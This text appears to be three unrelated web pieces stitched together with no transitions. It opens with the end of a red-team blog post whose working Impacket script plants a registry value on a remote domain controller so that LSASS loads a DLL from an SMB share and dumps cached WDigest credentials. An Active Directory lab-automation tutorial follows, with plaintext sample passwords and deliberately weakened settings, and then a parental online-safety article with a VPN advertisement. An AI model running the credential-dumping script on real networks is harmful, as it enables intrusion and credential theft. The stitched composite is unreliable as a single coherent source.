Let’s have a bit of fun by using our above WDigest credential extraction code to craft a DLL which will dump credentials for us.

To load our DLL, we can use a very simple Impacket Python script to modify the registry, adding a value to HKLM\SYSTEM\CurrentControlSet\Services\NTDS\DirectoryServiceExtPt pointing to our DLL hosted on an open SMB share, and then trigger the loading of the DLL using Impacket's hSamrConnect RPC call. The code looks like this:

from impacket.dcerpc.v5 import transport, rrp, scmr, rpcrt, samr
from impacket.smbconnection import SMBConnection

def trigger_samr(remoteHost, username, password):
    print("[*] Connecting to SAMR RPC service")
    try:
        rpctransport = transport.SMBTransport(remoteHost, 445, r'\samr', username, password, "", "", "", "")
        dce = rpctransport.get_dce_rpc()
        dce.connect()
        dce.bind(samr.MSRPC_UUID_SAMR)
    except Exception as e:
        print("[x] Error binding to SAMR: %s" % e)
        return

    print("[*] Connection established, triggering SamrConnect to force load the added DLL")

    # Trigger
    samr.hSamrConnect(dce)

    print("[*] Triggered, DLL should have been executed...")

def start(remoteName, remoteHost, username, password, dllPath):
    winreg_bind = r'ncacn_np:445[\pipe\winreg]'
    hRootKey = None
    subkey = None
    rrpclient = None

    print("[*] Connecting to remote registry")
    try:
        rpctransport = transport.SMBTransport(remoteHost, 445, r'\winreg', username, password, "", "", "", "")
    except Exception as e:
        print("[x] Error establishing SMB connection: %s" % e)
        return

    # Set up winreg RPC
    try:
        rrpclient = rpctransport.get_dce_rpc()
        rrpclient.connect()
        rrpclient.bind(rrp.MSRPC_UUID_RRP)
    except Exception as e:
        print("[x] Error binding to remote registry: %s" % e)
        return

    print("[*] Connection established")
    print("[*] Adding new value to SYSTEM\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt")

    try:
        # Add a new registry value
        ans = rrp.hOpenLocalMachine(rrpclient)
        hRootKey = ans['phKey']
        subkey = rrp.hBaseRegOpenKey(rrpclient, hRootKey, "SYSTEM\\CurrentControlSet\\Services\\NTDS")
        rrp.hBaseRegSetValue(rrpclient, subkey['phkResult'], "DirectoryServiceExtPt", 1, dllPath)
    except Exception as e:
        print("[x] Error communicating with remote registry: %s" % e)
        return

    print("[*] Registry value created, DLL will be loaded from %s" % (dllPath))
    trigger_samr(remoteHost, username, password)

    print("[*] Removing registry entry")
    try:
        rrp.hBaseRegDeleteValue(rrpclient, subkey['phkResult'], "DirectoryServiceExtPt")
    except Exception as e:
        print("[x] Error deleting from remote registry: %s" % e)
        return

    print("[*] All done")

print("LSASS DirectoryServiceExtPt POC\n  @_xpn_\n")
start("", "", "test", "wibble", "\\\\opensharehost\\ntds\\legit.dll")

And in practice, we can see credentials pulled from memory:


The code for the DLL used can be found here, which is a modification of the earlier example.

So hopefully this post has given you an idea as to how WDigest credential caching works and how Mimikatz goes about pulling and decrypting passwords during "sekurlsa::wdigest". More importantly I hope that it will help anyone looking to craft something custom for their next assessment. I’ll be continuing by looking at other areas which are commonly used during an engagement, but if you have any questions or suggestions, give me a shout at the usual places.

Automated Lab

Automated Lab: Automate Your Active Directory Security Lab

Building an active directory security lab is not easy, it requires time and resources as well as skills. What if we had an automated way of doing all the hard work?

Well, that's where AutomatedLab comes in handy!

AutomatedLab (abbreviated as AL) is an automated lab construction framework for Windows environments developed by Microsoft. You can use it to create labs for a variety of Active Directory environments. Besides a local Hyper-V environment, labs can also be built on Azure. What I personally find most powerful is that by passing a lab build script (.ps1) to another person, they can build exactly the same environment. This makes it ideal for training purposes and general learning.

Alright, let’s use AutomatedLab to automatically build the ideal Active Directory lab environment!

AutomatedLab (AL) enables you to set up lab and test environments on Hyper-V or Azure, with multiple products or just a single VM, quickly.

Requires one of:

  • .NET 4.7.1 (Windows PowerShell)
  • .NET Core 2+ (PowerShell 6+)

Requires one of:

  • Hyper-V host
  • Azure subscription

Also required:

  • Operating system DVD ISO images


There are two options for installing AutomatedLab:

  • You can use the MSI installer published on GitHub.
  • Or you install from the PowerShell Gallery using the cmdlet Install-Module.
    Please note that this is the ONLY way to install AutomatedLab and its dependencies in PowerShell Core/PowerShell 7 on both Windows and Linux/Azure Cloud Shell
Install-PackageProvider Nuget -Force
Install-Module AutomatedLab -AllowClobber

# If you are on Linux and are not starting pwsh with sudo
# This needs to executed only once per user - adjust according to your needs!
Set-PSFConfig -Module AutomatedLab -Name LabAppDataRoot -Value /home/youruser/.alConfig -PassThru | Register-PSFConfig

# Prepare sample content - modify to your needs

# Windows
New-LabSourcesFolder -Drive C

# Linux
Set-PSFConfig -Module AutomatedLab -Name LabSourcesLocation -Value /home/youruser/labsources -PassThru | Register-PSFConfig
New-LabSourcesFolder # Linux

From MSI

AutomatedLab (AL) is a bunch of PowerShell modules. To make the installation process easier, it is provided as an MSI.

Download Link: https://github.com/AutomatedLab/AutomatedLab/releases

There are not many choices when installing AL.


The options Typical and Complete are actually doing the same and install AL to the default locations. The PowerShell modules go to “C:\Program Files\WindowsPowerShell\Modules”, the rest to “C:\LabSources”.

As LabSources can grow quite big, you should go for a custom installation and put this component on a disk with enough free space to store the ISO files. This disk does not have to be an SSD. Do not change the location of the modules unless you really know what you are doing.


Very important to AL is the LabSources folder that should look like this:


If all that worked, you are ready to go.

Demo: See the power of AutomatedLab!

With AutomatedLab set up, try running the following PowerShell script with administrator privileges.

New-LabDefinition -Name Lab1 -DefaultVirtualizationEngine HyperV

Add-LabMachineDefinition -Name DC1 -Memory 1GB -OperatingSystem 'Windows Server 2019 Standard Evaluation (Desktop Experience)' -Roles RootDC -DomainName contoso.com
Add-LabMachineDefinition -Name Client1 -Memory 1GB -OperatingSystem 'Windows 10 Enterprise Evaluation' -DomainName contoso.com

Install-Lab

Show-LabDeploymentSummary -Detailed

Running this will create a Windows Server 2019 domain controller and a Windows 10 client as virtual machines on Hyper-V.

In just four lines, Windows Server and Windows 10 are installed, Active Directory is built, and the Windows 10 client is domain-joined.
How exciting!


Let's set it up right away. Unfortunately, decent machine specs are required to run virtual machines. You will also need to download the operating system ISO files, so it might take some time if you are starting from scratch, depending heavily on your internet speed.


You need plenty of memory, storage, and processor power: an environment where you can run multiple virtual machines at the same time.
At least 8GB of memory; 16GB or 32GB is recommended depending on the number of virtual machines you are going to create.

With SSD storage, especially an NVMe SSD, build times will be very fast.

Next step…

Keep the following enabled:
· Intel VT-x / AMD-V in the BIOS
· The Hyper-V related features under "Turn Windows features on or off"

Other virtualization software such as VMware Workstation can conflict with Hyper-V; as of Windows 10 2004, VMware Workstation supports the Hyper-V platform.
If you want to use them in parallel, update to Windows 10 2004. Before 2004, you have no choice but to uninstall the other virtualization software.
VirtualBox also appears to be compatible with the Hyper-V platform.


Install AutomatedLab
Start Powershell with administrator privileges and execute the following command.
Note: installation using msi may not be able to install all the necessary modules, so I do not recommend it.

Install-Module AutomatedLab -Force -AllowClobber

If you don’t have NuGet on your computer, you’ll be prompted to install NuGet, so follow the instructions to install it.

Installing LabSources
Once AutomatedLab is installed, install LabSources. LabSources is the folder where lab resources are located.

> New-LabSourcesFolder

* If you want to install on another drive, specify it with -DriveLetter (e.g. "-DriveLetter D").

Getting an error when executing an AutomatedLab command

When you try to execute an AutomatedLab command, including the one above, the following error may occur:

The 'New-LabSourcesFolder' command was found in module 'AutomatedLab', but this module could not be loaded.

This is due to PowerShell's script execution policy, and there are two ways to resolve it:
1.  Permanently relax the execution policy.
2.  Temporarily relax it by starting PowerShell with the "-ExecutionPolicy Bypass" option each time.  * In this case, you also need to run "Import-Module AutomatedLab" each time you use AL.

The execution policy can be relaxed temporarily at launch as in option 2, but if you later create lab configurations in PowerShell ISE, option 2 will still be blocked by the execution policy and execution will fail, so choose option 1.

Set-ExecutionPolicy Unrestricted

* Execute with administrator privileges

If you are concerned about security, return the policy to Restricted when you no longer use AL.

Whether to send diagnostic information when AutomatedLab is executed for the first time.

When you execute it for the first time, you will be asked the following questions.

Opt in to telemetry?

Whether to send diagnostic information. Please choose either Yes or No.

Download ISO file

AL can use an ISO image only if it contains an image file named install.wim. ISO files such as Windows 10 Pro downloaded with the Windows Media Creation Tool do not contain install.wim and cannot be used as-is. The trial version ISO files do include install.wim, so use those for verification purposes.

The trial version ISO file for each OS is as follows.

Windows Server 2019
Windows 10 Enterprise

Please prepare the English (US) version of each of these. The architecture is up to you, but this time we will use x64.
* You need to enter your name, company name, and phone number to download the ISO files.

After downloading the ISO file, place it in the ISOs folder inside the AL LabSources folder.
The LabSources folder is created directly under the C drive by default.

After placing the file, use the Get-LabAvailableOperatingSystem command in PowerShell to make sure the ISO file is recognized.

PS C:\WINDOWS\system32> Get-LabAvailableOperatingSystem |ft OperatingSystemImageName
20:30:25|00:48:57|00:48:57.052| Scanning 2 files for operating systems
Found 5 OS images.
Windows 10 Enterprise Evaluation
Windows Server 2019 Standard Evaluation
Windows Server 2019 Standard Evaluation (Desktop Experience)
Windows Server 2019 Datacenter Evaluation
Windows Server 2019 Datacenter Evaluation (Desktop Experience)

This completes the basic setup.

Let’s create our lab

Time required: 10-20 minutes (depending on machine specifications)

Since sample scripts exist in LabSources, you can get a general idea of the approach by looking at them.
The tutorials on the GitHub wiki can also help you.

In addition, the extensive documentation can be found at the following URL. However, it seems that it is not the latest, so be careful.
(For the latest information, you can only use Get-Help or read the code in the repository )

Let's install Windows Server 2019.
First, run Windows PowerShell with administrator privileges.
Next, copy the following commands into a text editor and save them as a .ps1 file.

# Declaration to create a lab called TestLab
# Everything you set from now on is applied by executing the "Install-Lab" command
# The default virtualization engine is Hyper-V. This is a required option.
New-LabDefinition -Name TestLab -DefaultVirtualizationEngine HyperV

## Create a machine for Windows Server 2019
# PowerShell can split long commands across multiple lines by putting a backtick (`) at the end.
# -OperatingSystem: use the OperatingSystemImageName shown by Get-LabAvailableOperatingSystem
Add-LabMachineDefinition `
 -Name ws2019 `
 -Memory 2GB `
 -OperatingSystem 'Windows Server 2019 Standard Evaluation (Desktop Experience)'

# Apply the settings and create the lab
Install-Lab

# Show deployment results
Show-LabDeploymentSummary -Detailed

As long as you are using the trial version, it makes no practical difference whether you pick Standard or Datacenter. If you want to use it commercially, it is best to use the Datacenter option in case you later purchase a license.

Execute the script.

Once executed, the lab will start building.

Since the base image is created for each OS, it will take some time for the first time. The second and subsequent times are much faster.

After a while, the process will complete and you will see the Show-LabDeploymentSummary results.

If the account name and password are not specified when defining a machine, the default values are used.
As shown in the summary, the administrator account is set to "Administrator" and the password to "Somepass1" by default.
The network settings are similar: by default a network with a /24 subnet is created in a range that avoids conflicting with the host's network.
The machines are not connected to the internet with this setting, but you can still connect to them and do a lot of things.

Connect to the lab machine

Type the following commands at the shell prompt at the bottom of PowerShell ISE. You may want to close the command window on the right side of the screen, as it can steal keyboard input.

RDP connection

You can use the Connect-LabVM command to make an RDP connection.

> Connect-LabVM ws2019

Enter "Administrator" as the user name and "Somepass1" as the password.

You can also use "Remote Desktop Connection" (mstsc) directly from the command line:

> mstsc /v:ws2019

Establish a PowerShell session with our lab machine

The lab machine has WinRM enabled by default, so PSSession is available.
By using Enter-LabPSSession, AL will use your credentials to establish the session.

> Enter-LabPSSession ws2019

[ws2019]: PS C:\Users\Administrator\Documents> whoami

Have your lab machine run PowerShell cmdlets

Let's make sure that Invoke-LabCommand can execute arbitrary code.

> Invoke-LabCommand -ComputerName ws2019 -ScriptBlock {Write-Host (whoami)}
19:21:19|00:03:09|00:00:00.000| Executing lab command activity: '<unnamed>' on machines 'ws2019'
19:21:19|00:03:09|00:00:00.009| - Waiting for completion
19:21:29|00:03:19|00:00:10.159| - Activity done

Invoke-LabCommand can target a lab machine and use a ScriptBlock to execute arbitrary PowerShell code and OS commands. This time, the output of the whoami command is written to standard output using the Write-Host cmdlet.
It's not very useful at this point, but it's sometimes used for post-processing after lab installation.

Create a domain environment

• Time required: 30-40 minutes

Next, based on "04 Single domain-joined server.ps1" in the Introduction folder of SampleScripts, create and build a script that installs Windows Server 2019 and sets up a domain environment. This time we'll set the domain administrator password with Add-LabDomainDefinition.

Paste the following script into PowerShell ISE and run it, or paste it into a text editor, save it as filename.ps1, and run it from PowerShell.
* It looks long, but most of it is comments (tips).

# Delete the lab first if it already exists
# The machine namespace is shared across all labs, so be careful not to create
# duplicate machine names if you keep existing labs around.

# Declaration to create a lab called TestDomainLab
# Everything you set from now on is applied by executing the "Install-Lab" command
# The default virtualization engine is Hyper-V. This is a required option.
New-LabDefinition -Name TestDomainLab -DefaultVirtualizationEngine HyperV

# Since the domain name is used on multiple machines, make it a variable.
$TestDomain = 'al.corp'

## Domain admin user information.
$DomainAdminUser = "aladmin"
$DomainAdminPassword = "[email protected]!"

## Set the user account used during OS installation for lab construction (local user).
# Set-LabInstallationCredential is common within the lab. It can be overwritten along the way.
# For domain controllers, Set-LabInstallationCredential and Add-LabDomainDefinition must be
# given the same information.
# However, doing so leaves a "local administrator account" with the same credentials as the
# domain administrator on every machine other than the DC.
# Therefore, when building a proper lab, it is better to specify a separate local user for
# kitting via the -InstallationUserCredential option of Add-LabMachineDefinition on non-DC machines.
Set-LabInstallationCredential -Username $DomainAdminUser -Password $DomainAdminPassword

# Set the domain administrator account
Add-LabDomainDefinition -Name $TestDomain -AdminUser $DomainAdminUser -AdminPassword $DomainAdminPassword

## Create a domain controller
# PowerShell can split long commands across multiple lines by putting a backtick (`) at the end.
# -Roles: specifies the role of the machine. DCs and SQL Servers need various settings, but AL
#  predefines most of them in the form of a Role.
#  A single or forest-root domain controller uses the RootDC role.
#  See the "About Roles" section of the documentation for the list of roles.
# -DomainName: the domain name. This time it is named after AutomatedLab. Machines that should
#  belong to the same domain must use the same DomainName.
# This OS image is not a Desktop Experience edition, which is recommended if you want a lighter installation.

Add-LabMachineDefinition `
-Name DC1 `
-Memory 2GB `
-OperatingSystem 'Windows Server 2019 Standard Evaluation' `
-Roles RootDC `
-DomainName $TestDomain

## Create a Windows 10 client machine (in fact, using WS2019 for the client as well makes setup faster)
Add-LabMachineDefinition -Name Client1 -Memory 2GB -OperatingSystem 'Windows 10 Enterprise Evaluation' -DomainName $TestDomain

# Apply the settings and create the lab
Install-Lab

# Show deployment results
Show-LabDeploymentSummary -Detailed

As you can see in the comments, the Install-Lab command starts the creation. You can change the configuration as much as you want.
If possible, it's more time-efficient to iterate on the configuration and only add Install-Lab at the end, rather than repeating a time-consuming deployment each time. There are many things you won't understand until you try, so iterate with scrap-and-build until you get used to it.

As a result, it took about 30 minutes.

As I wrote in the script comments, because of Set-LabInstallationCredential, Client1 has a local administrator with the same credentials as the domain administrator account.
To avoid this, set up a separate local administrator account for kitting via the Add-LabMachineDefinition options.

The client also belongs to the al.corp domain .

Domain Admins also includes the "aladmin" account configured in the build script.

[DC1]: PS C:\Users\aladmin\Documents> net group "Domain Admins" /domain
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            aladmin
The command completed successfully.

It took a while to set up the domain and Windows 10, but it's very easy: define two machines from scratch and simply wait about 30 minutes with a cup of coffee while the domain is set up.
Let’s check using Enter-LabPSSession and Connect-LabVM Commands.

What about settings such as user accounts? → You do them yourself

Unfortunately, for the sake of simplicity, AL only covers the automated setup of the machines themselves.
After building the machines, you write PowerShell yourself for additional setup such as user accounts, group additions, and group policies.
User accounts can be easily added using the New-ADUser cmdlet on the domain controller.

Post Installation Activity

AL has a "PostInstallationActivity" feature that automatically executes a script inside a virtual machine after the machine is built. A PostInstallationActivity can be specified in the definition options for each machine. Create a TestLab folder under C:\LabSources\PostInstallationActivities and save the following script as PrepareDomain.ps1 in that folder.

Start-Transcript C:\Windows\Temp\postinstall.log -Append

$users = @()
$users += @{Name = "abe"; Password = "[email protected]"}
$users += @{Name = "iijima"; Password = "[email protected]"}
$users += @{Name = "usui"; Password = "[email protected]"}

ForEach ($user in $users){
   $securePassword = $user.Password | ConvertTo-SecureString -AsPlainText -Force
   New-ADUser -Name $user.Name `
             -AccountPassword $securePassword `
             -PasswordNeverExpires $true `
             -Enabled $true
}

Write-Output "Useradd done."

Stop-Transcript

As you can see, this is a script that puts usernames and passwords in an array and passes them to New-ADUser in turn.

I manage users, groups, and OUs with a CSV file for each domain.

By default, the password complexity requirement is enabled, so if you want to set a weak password, you need to change the group policy.

Next, add the PostInstallationActivity option to the domain controller in the build script above .

$postInstallActivity = Get-LabPostInstallationActivity `
                   -ScriptFileName PrepareDomain.ps1 `
                   -DependencyFolder "C:\LabSources\PostInstallationActivities\TestLab"

# Domain Contoller
Add-LabMachineDefinition `
-Name DC1 `
-Memory 1GB `
-OperatingSystem 'Windows Server 2019 Standard Evaluation' `
-Roles RootDC `
-DomainName $TestDomain `
-PostInstallationActivity $postInstallActivity

In the $postInstallActivity variable, declare the script file name and its dependency folder as options of the Get-LabPostInstallationActivity cmdlet, and build the lab again.

After installation, you can confirm that the user is properly created as shown below.


Precautions after lab creation

In my builds, I've identified the following security concerns in the default state. If you want to build a CTF-like environment and let others use it, please deal with these in advance.

  • C:\unattend.xml contains the kitting user's credentials
  • AutoLogon is enabled by default, leaving the password in HKLM\SECURITY\Policy\Secrets\DefaultPassword
  • The local administrator account used for kitting remains enabled
  • WinRM is enabled
  • UAC is disabled
  • Windows Firewall is disabled

What do you think?

I would be more than happy to share the joy of writing scripts for automating AD labs.
I enjoyed the automation and wrote a lot of build scripts and PostInstallationActivity scripts to create a vulnerable environment like the one below, which can be set up fully automatically in about 2 hours.
Wayans corp

<script src="https://gist.github.com/jimmwayans/daa86a8260aa74351206ef55769cb772.js"></script>

With AutomatedLab (and lots of PowerShell) you can create complex environments: two connected forests, MSSQL database links, Kerberoastable or AS-REP roastable accounts, or RDP with PtH against a Restricted Admin mode machine.
It was difficult but interesting to arrange things so that an NTLM hash always remains on a specific machine.

There are also ways to connect the virtual machines to the internet, but that would take a while to explain, so I will omit it here. Check the SampleScripts folder for examples.
I enjoy validating C2 frameworks by putting Squid on a router machine so that the internet can only be reached via a proxy.

Finally, I will end with a collection of frequently used AL commands.


Frequently used commands

All help can be found in Read the Docs below.
Here are some frequently used commands.

Whole lab

View list of labs

Get-Lab -List 

View a list of already installed labs.
The displayed lab can import sessions with the Import-Lab command.

Lab session restoration
Import-Lab [Lab name]

Restores an installed lab session. Required to operate the lab again after closing the PowerShell window in which it was built. Lab information is imported into the PowerShell session, allowing you to stop and start machines, get information, connect, and take snapshots.

List of lab machines

View lab machine information.

Obtaining detailed information during lab installation
Show-LabDeploymentSummary -Detailed

Display all machine names and network information, including the administrator user password at the time of installation.

Lab removal

Lab machines, network adapters, etc. are all deleted.

Stop and start the machine

Suspend (save state)
Save-LabVM [-Name <computer name> | -All]

The argument is a computer name; using “-All” applies the command to all lab machines.
The machine state, including memory, is saved; when the machine starts again, it resumes where it left off.

Stop-LabVM [-Name <computer name> | -All]

The argument is a computer name; using “-All” applies the command to all lab machines.
A shutdown signal is sent.

Start-LabVM [-Name <computer name> | -All]

The argument is a computer name; using “-All” applies the command to all lab machines.

Snapshots

Take a snapshot
Checkpoint-LabVM [-ComputerName <computer name> | -All] -SnapshotName <snapshot name>

The argument is a computer name; using “-All” applies the command to all lab machines.

  • Specify the snapshot name with -SnapshotName; it is required.
> Checkpoint-LabVM -All -SnapshotName InitialSetup

* If the snapshot (checkpoint) is not displayed in either Get-LabVMSnapshot or Hyper-V Manager even after executing this, creation may have failed due to insufficient free space. Try creating one with Hyper-V Manager and check the error it reports.

Checking the snapshot
Get-LabVMSnapshot [-ComputerName <computer name>] 

If nothing is specified, information on all lab machines will be displayed.

> Get-LabVMSnapshot

SnapshotName CreationTime       ComputerName
------------ ------------       ------------
InitialSetup 2020/08/21 0:04:06 ws2016      
second       2020/08/21 0:05:55 ws2016

Restore snapshot
Restore-LabVMSnapshot [-ComputerName <computer name> | -All] -SnapshotName <snapshot name>

The argument is a computer name; using “-All” applies the command to all lab machines.

  • Specify the snapshot name with -SnapshotName; it is required.
> Restore-LabVMSnapshot -All -SnapshotName InitialSetup

Machine connection

Establish a PowerShell session with a lab machine
Enter-LabPSSession -ComputerName <computer name>

A PowerShell session is established via PSRemoting. If the lab machine belongs to a domain, the credentials of the domain admin kitting user that was used when building the lab are applied. If it does not belong to a
domain, the local kitting user’s credentials are used.

RDP connection to lab machine
Connect-LabVM -ComputerName <computer name>

You can also use the standard Windows Remote Desktop Client (mstsc).

mstsc /v:<computer name>


Establish a PSRemoting session with any credentials
$sess = New-LabPSSession -ComputerName <computer name> -Credential <PSCredential>

You can establish a PS session with arbitrary credentials. This is useful if you change the domain administrator password after installing the lab.

AutomatedLab cannot detect that the password has been changed after installation, so its default login fails.

Using the return value PSSession, you can open a PS session for the lab machine as follows.

Enter-PSSession -Session <PSSession>
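
Putting it together, a round trip with changed credentials might look like this. The computer name, domain and password below are hypothetical.

```powershell
# Build a PSCredential for the new (hypothetical) domain admin password
$password = ConvertTo-SecureString 'NewP@ssw0rd!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('CONTOSO\Administrator', $password)

# Open a lab PS session with those credentials and enter it
$sess = New-LabPSSession -ComputerName DC01 -Credential $cred
Enter-PSSession -Session $sess
```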

File transfer (host -> lab machine)
Copy-LabFileItem -ComputerName <Computer name> -Path <Host computer source file / directory> -DestinationFolderPath <Lab machine destination folder>

Transfer files from the host computer to the lab machine.
The credentials of the administrator user from lab construction are used. Note that all files/folders arrive with the read-only attribute set.
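
If the read-only attribute gets in the way, it can be cleared on the lab machine afterwards. A sketch; the machine name and path here are hypothetical:

```powershell
# Clear the read-only attribute on everything that was copied over
Invoke-LabCommand -ComputerName WS01 -ScriptBlock {
    Get-ChildItem 'C:\Tools' -Recurse -File |
        ForEach-Object { $_.IsReadOnly = $false }
}
```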

File transfer 2 (host -> lab machine)
Send-File -SourceFilePath <Source file on host computer> -DestinationFolderPath <Destination folder on lab machine> -Session <PSSession>

Send-Directory -SourceFolderPath <Host computer source directory> -DestinationFolderPath <Lab machine destination folder> -Session <PSSession>

Sends files to the lab machine using an arbitrary PSSession. Useful if you changed the domain administrator password after installing the lab.

File transfer (lab machine -> host)
Receive-File -SourceFilePath <Lab source file> -DestinationFolderPath <Host computer destination folder> -Session <PSSession>

Receive-Directory -SourceFolderPath <Lab source directory> -DestinationFolderPath <Host computer destination folder> -Session <PSSession>

Receives files from a lab machine using an arbitrary PSSession. Useful if you changed the domain administrator password after installing the lab.


There is more I could write, but I believe that what is covered so far will be useful to some people.
Let’s make your AD verification life easier with AutomatedLab!

My Powershell script for AL: @jimmwayans

Follow me on twitter for more infosec resources: @jimmwayans


Steering clear of the internet these days is almost impossible unless you have made a clear and conscious decision to abandon modern society and live free like the Pokot nomads in West Pokot. Since the latter is not an option for most of us, we should educate ourselves about the dangers of the internet, especially in terms of parental control and children’s exposure to unwanted content.

In simple terms, the impact of the internet on the modern household divides into cyber safety and security. Before we even consider that, we should look at ways to stay informed about what children are drawn to on the internet, and how to control or limit visits to sites that are not appropriate for their age and upbringing. Or should we just rely on confidence in our superb parenting skills, hoping that will be enough? Absolutely not!

Online Safety

The Cobb Schools Instructional Technology team created a Student Online Safety resource with a list of best practices for online safety.

Top 10 Cyber Safety Tips for Parents

#1 Be Informed, Up-to-Date, and Alert

Of course, first and foremost we have to assume that the situation at home is stable and secure, and that parents have the time to discuss and share their views and concerns when it comes to the internet. They should be more than merely curious, but also approach with caution, as the “wrong attitude” can shut their kids off and keep the most important information from being fully disclosed: what their kids like to do online. Gaming, general searches and the many other things that fall under the umbrella of a digital footprint should, and must, be part of this discussion.

We can also learn something from the general attitude of the great Steve Jobs, whose first rule in his own household was that no computers, laptops or mobile phones were allowed in his home. He had thus found a fairly easy solution to one of the most important aspects of child cyber security for parents: be aware of how much time they spend online, and how!

It is very difficult, sometimes even impossible, for parents to keep up. In some cases parents have little or no understanding of what their kids are doing online, and even if they did, they don’t have the time to educate, listen and point them in the right direction; they merely rely on the off chance that it will all be all right. Often it does not unfold that way, especially when parents are under the impression that filtering software and the ability to block certain websites give them sufficient control. The truth of the matter is quite different, simply because there is so much content out there that some of it, if not all, will most definitely get around such a simple and insufficient approach to parental controls.
Summing up, the first point is easy to understand and can even be fun to implement: stay connected to your kids, talk to them, learn from them, keep abreast of updates, be open to their questions, and invest in that bond, which is likely to be your best tool for keeping them safe and sound both on- and offline.

#2 Know the Tools, Risks, Rules, and Approach

There is no way around it, get early into the game, that way you will never be late with a reaction.

The internet is everywhere: in schools, at home, on phones, in cafés, at birthdays, at the theatre, so it should be no surprise that kids learn faster than their parents. It is used for school research projects and reports, to communicate with teachers and other kids, and to play interactive games.

Being surrounded by it comes at a cost, which in most cases is unwanted content they come across by being curious and clicking on a pop-up or a YouTube sidebar video. It also comes in harder scenarios like cyber-bullying and, just like in any other jungle, online predators. Because of this, both you and your children should be aware of the significance of anonymity online. Not using your real name and connecting only through a VPN will make it far harder for a predator to pinpoint and dox (a term for disclosing private information) your children and do them any harm. With Le VPN you will be able to appear as if you are from another country, diminishing the chance of your child being attacked by malicious software or spyware.

Online predators are known for impersonating others, even children: on software and websites where kids interact, predators may pose as a child or teen looking to make a new friend. Their scam is to get as much information from a child as they possibly can (personal information, address, phone number, etc.), which is why our first point is of paramount importance: parents have to be informed, and stay informed, about what their kids see and hear on the internet, who they meet, and what they share about themselves. Use that privilege and that wonderful bond to talk freely with them, but never take your gaze off their activities.

*Children’s Online Privacy Protection Act – Internet Safety Laws

Regulated at the federal level, the Children’s Online Privacy Protection Act (COPPA) assists in the protection of children under the age of thirteen. Broken down, it is a safeguard for parents: children’s personal information cannot be obtained without the parents’ awareness and consent.

COPPA requires websites to explain their privacy policies and obtain parental consent before collecting and/or using a child’s personal information (name, address, phone number, social security number, etc.). It also includes a prohibition that acts as another safeguard.

This prohibition prevents a site from collecting more information than necessary, for instance by requiring a child to provide extra personal information in order to play a game or enter a contest.

#3 Use Online Protection Tools

The use of online tools allows parents a degree of control over kids’ access to inappropriate adult material and helps protect children from internet predators. One of the basic options is that many Internet service providers (ISPs) offer parental-control features. Parents can also use programs or specifically designed software that blocks access to sites and restricts personal information from being sent online, while others resort to monitoring software to track online activity.

It is never too much to repeat and continuously point out the necessity of going back to the very basics, which entails being involved in your children’s online activities.

Never share basic personal information (address, phone number or school name or location);

Use only a screen name, and never share passwords;

Never consent or promise to meet in person with anyone you have met online without parent knowledge, approval and/or supervision.

Never respond to a threatening email, message, post, or text.

Always consult and fully inform a parent or another close relative or trusted adult about any communication or conversation that was scary or hurtful.

A few very useful cyber safety tips pertaining to parental control and supervision:

  • Investing your time together online will give your children an incentive to turn to you with any questions and dilemmas and, more importantly, educate them in appropriate online behavior;
  • Positioning and choice of location might not sound relevant, but common sense and logic suggest otherwise. Keeping the computer in a common area (where you can watch and monitor its use) gives you full awareness of how much time your child spends on the computer and of the interests and content choices they make online; in other words, the computer should not be in an individual bedroom. The same goes for any other internet-connected device, such as tablets and smartphones: stay close enough to monitor their content visually;
  • Use bookmarks to allow your children to have easy access to favorite sites;
  • If they frequent gaming sites or certain educational websites, disable purchases, and check your credit card and phone bills often for any unknown charges.
  • Also ask about, and educate yourself on, the options and solutions offered by the school, after-school care, friends’ homes, or any other location where your children access the internet without your supervision;
  • Be alert: observe and listen for warning signs, and encourage your children to discuss and report uncomfortable online exchanges or anything they have seen or heard online that frightened them;
  • Be vigilant in terms of any signs that would suggest your children are being targeted by an online predator by looking for answers to these types of questions:
    • Do they spend long hours online, especially at night?
    • Are they receiving phone calls from people you don’t know?
    • Are unsolicited gifts arriving in the mail?
    • Do they often suddenly turn off the computer or the sound when you walk into the room?
    • Did you notice a sudden withdrawal from family life and hesitation and/or reluctance to talk about their online activities?

But what do we do when they grow older?

It is true, they often do; so how can we maintain the same level of monitoring and supervision when they are no longer within our immediate reach?

It comes naturally with age that they will want and appreciate more privacy, but it remains a must to take precautions, such as a simple discussion of the sites and apps they use and of their online experiences.

If you have not already done so, alert them to the dangers of interaction, especially with people they don’t know, and point out a simple fact: nothing is exactly as it appears online, and people online don’t always tell the truth.

Provide them with a thorough explanation of the use of passwords as a safeguard against identity theft.

#4 Encourage Critical Thinking

If everything we see in the virtual world were true, we would all be flying magicians or world-renowned innovators, able to multiply ourselves into as many profiles as we happen to need during the day.
Make criticism and logic, common sense and respect the baseline of your talks with your children, but don’t forget caution and safeguards.

Teach them how to recognize and block unwanted contacts arriving by phone, email, text, social networking or online games, but also make them understand that what they share with the rest of the online world can be seen by people they never thought of or had in mind at all.

On the other hand, their digital footprint could not only last forever but, if they master it well, also assist them in the future by reflecting their skills and creativity.

#5 Set Up Your Internet for Safe Use

We have already mentioned filters and monitoring internet use, but you could also consider enabling Google SafeSearch on all the devices your household uses.

Within the services themselves, you can enable parental controls on streaming platforms such as YouTube, Netflix and Apple TV, and also install software that filters content or lets you choose at what times devices can or cannot be used; this addresses the Steve Jobs attitude mentioned earlier of limiting time spent in the virtual world.

Use built-in options such as the search history in their browser, and know their email addresses and passwords so you can monitor activity. Many devices use cloud storage like Google Drive or Apple iCloud to store documents, photos and videos; access to these can also be controlled.

Last but not least, educate them about GPS and check-in functions, which identify your child’s location when they are outside; these can be limited or permanently disabled.


#6 Learn about Social Networks

Of course, it’s out there, and it’s huge – Instagram, Twitter, Facebook, and so many others with a similar function – to connect with other people.

Yes, it’s true: having friends and connecting with others is very important to children and young people. They use social media in many ways these days: to maintain contact with family, to promote themselves on Instagram, or to talk to friends over WhatsApp, Snapchat or Viber. Apps that involve messaging between individuals are numerous, but they pose a certain degree of danger, especially when children are messaging people they don’t know and trust in real life.

Again, use common sense and logic: inform and educate them about the fact that messages and photos they share can be viewed and obtained by others. Teach them to set and use privacy settings so that their profile is only seen by people they know, and check these settings often.

Teach them how to report abuse or inappropriate content to the social networking service or other agency especially when it comes to inappropriate content. Make sure children and young people understand the risks of sending or forwarding sexual texts, images or videos (sexting) and the harm this can cause to themselves and others.

